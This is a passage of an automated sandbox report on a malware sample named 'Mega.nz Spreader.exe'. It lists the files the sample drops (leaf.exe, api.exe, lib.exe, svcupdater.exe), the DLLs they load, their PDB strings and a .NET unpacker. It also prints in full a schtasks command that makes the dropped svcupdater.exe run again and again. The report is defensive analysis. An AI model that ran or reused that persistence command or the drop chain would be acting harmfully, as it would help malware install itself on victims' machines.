Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn \eOzNUSwmQA /tr "C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process created: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe "{path}"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process created: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe "{path}"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Process created: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe "{path}"	Jump to behavior

Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\api.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lib.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\Mega.nz Spreader.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\leaf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Mega.nz Spreader.exe

Static file information: File size 8953856 > 1048576

Source: Mega.nz Spreader.exe

Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x888c00

Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: lib.exe, 00000005.00000003.2052982801.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000002.2087957246.00007FF8B9063000.00000002.00000001.01000000.00000012.sdmp, select.pyd.5.dr
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: lib.exe, 00000005.00000003.2053206684.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: kaikoBF.pdb source: Mega.nz Spreader.exe, 00000000.00000002.2038521099.00000000011BE000.00000004.00000020.00020000.00000000.sdmp, leaf.exe, 00000001.00000000.2029236657.00000000008A2000.00000002.00000001.01000000.00000005.sdmp, leaf.exe.0.dr, svcupdater.exe.9.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: lib.exe, 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmp, _ctypes.pyd.5.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: lib.exe, 00000005.00000003.2039566373.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: lib.exe, 00000005.00000003.2039763643.00000273A7FBB000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.5.dr
Source:	Binary string: kaikoBF.pdbSHA256 source: Mega.nz Spreader.exe, 00000000.00000002.2038521099.00000000011BE000.00000004.00000020.00020000.00000000.sdmp, leaf.exe, 00000001.00000000.2029236657.00000000008A2000.00000002.00000001.01000000.00000005.sdmp, leaf.exe.0.dr, svcupdater.exe.9.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: lib.exe, 00000005.00000003.2041399865.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Cassa.pdb source: leaf.exe, 00000001.00000002.2188032639.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, leaf.exe, 00000001.00000002.2187846427.0000000002B00000.00000004.08000000.00040000.00000000.sdmp, leaf.exe, 00000001.00000002.2188032639.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 0000000E.00000002.2617772935.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 0000000E.00000002.2617772935.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 00000012.00000002.2877978549.0000000002927000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 00000012.00000002.2877978549.0000000002910000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Cassa.pdbSHA256 source: leaf.exe, 00000001.00000002.2188032639.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, leaf.exe, 00000001.00000002.2187846427.0000000002B00000.00000004.08000000.00040000.00000000.sdmp, leaf.exe, 00000001.00000002.2188032639.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 0000000E.00000002.2617772935.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 0000000E.00000002.2617772935.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 00000012.00000002.2877978549.0000000002927000.00000004.00000800.00020000.00000000.sdmp, svcupdater.exe, 00000012.00000002.2877978549.0000000002910000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: lib.exe, 00000005.00000003.2039763643.00000273A7FBB000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.5.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: lib.exe, 00000005.00000003.2038462623.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: lib.exe, 00000005.00000003.2038247890.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: lib.exe, 00000005.00000003.2038247890.00000273A7FBA000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: lib.exe, 00000005.00000003.2041546243.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp, lib.exe, 00000007.00000002.2087738939.00007FF8B8F88000.00000002.00000001.01000000.00000011.sdmp, _socket.pyd.5.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: lib.exe, 00000005.00000003.2040581101.00000273A7FBC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python311.pdb source: lib.exe, 00000007.00000002.2084707630.00007FF8A88BB000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: _ssl.pyd.5.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 1.2.leaf.exe.2b00000.0.raw.unpack, CCM.cs	.Net Code: DeleteMC System.AppDomain.Load(byte[])
Source: 1.2.leaf.exe.2df1e68.1.raw.unpack, CCM.cs	.Net Code: DeleteMC System.AppDomain.Load(byte[])
Source: 1.2.leaf.exe.2de1df4.3.raw.unpack, CCM.cs	.Net Code: DeleteMC System.AppDomain.Load(byte[])
Source: 14.2.svcupdater.exe.2a27b90.1.raw.unpack, CCM.cs	.Net Code: DeleteMC System.AppDomain.Load(byte[])

Source: lib.exe.0.dr	Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.5.dr	Static PE information: section name: .00cfg
Source: libssl-1_1.dll.5.dr	Static PE information: section name: .00cfg
Source: python311.dll.5.dr	Static PE information: section name: PyRuntim
Source: VCRUNTIME140.dll.5.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\AppData\Local\Temp\leaf.exe	Code function: 1_2_0119E7C2 push eax; ret	1_2_0119E7C9
Source: C:\Users\user\AppData\Local\Temp\api.exe	Code function: 3_2_00E1090C push ecx; ret	3_2_00E1091F
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 21_2_0125C7A7 push cs; iretd	21_2_0125C85F
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 21_2_0125E7C3 push eax; ret	21_2_0125E7C9
Source: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Code function: 21_2_0125C808 push cs; iretd	21_2_0125C85F

Persistence and Installation Behavior

Found pyInstaller with non standard icon

Source: C:\Users\user\AppData\Local\Temp\lib.exe

Process created: "C:\Users\user\AppData\Local\Temp\lib.exe"

Source: C:\Users\user\AppData\Local\Temp\lib.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66002\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66002\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66002\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66002\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66002\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66002\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66002\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66002\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66002\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Mega.nz Spreader.exe	File created: C:\Users\user\AppData\Local\Temp\api.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lib.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66002\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\leaf.exe	File created: C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe	Jump to dropped file
